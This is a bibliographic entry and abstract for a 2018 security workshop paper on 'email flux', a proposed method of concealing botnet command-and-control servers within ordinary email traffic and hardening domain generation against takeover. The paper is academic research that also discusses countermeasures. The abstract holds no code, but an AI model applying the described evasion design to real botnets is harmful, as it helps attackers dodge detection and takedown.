Research Article
Hiding Fast Flux Botnet in Plain Email Sight
@INPROCEEDINGS{10.1007/978-3-319-78816-6_14, author={Zhi Wang and Meilin Qin and Mengqi Chen and Chunfu Jia}, title={Hiding Fast Flux Botnet in Plain Email Sight}, proceedings={Security and Privacy in Communication Networks. SecureComm 2017 International Workshops, ATCS and SePrIoT, Niagara Falls, ON, Canada, October 22--25, 2017, Proceedings}, proceedings_a={SECURECOMM \& ATCS \& SEPRIOT}, year={2018}, month={4}, keywords={Fast flux Domain flux Botnet Command and control channel Evasion technique}, doi={10.1007/978-3-319-78816-6_14} }- Zhi Wang
Meilin Qin
Mengqi Chen
Chunfu Jia
Year: 2018
Hiding Fast Flux Botnet in Plain Email Sight
SECURECOMM & ATCS & SEPRIOT
Springer
DOI: 10.1007/978-3-319-78816-6_14
Abstract
Fast flux and domain flux are widely used as evading techniques to conceal botnet C&C server. But nowadays, more and more machine learning schemes are introduced to recognize and detect fluxing botnet automatically and effectively. In this paper, we propose a novel fluxing scheme to hide C&C server in plain email sight. Email flux tries to blend in with normal email communication. With the excellent reputation of email servers, the malicious activity is more likely to get lost in the normal email crowd. Therefore, DNS-based botnet detection schemes are difficult to detect the email flux botnet. Comparing to the cost of registering a public IP address or a domain, the cost of registering an email account is much less, and email account reveals less geolocation information. And we introduce asymmetric encryption strategy to fortify DGA, preventing adversaries from taking down the botnet by registering email account before bot master. We also discuss possible countermeasures in the future to mitigate email flux.
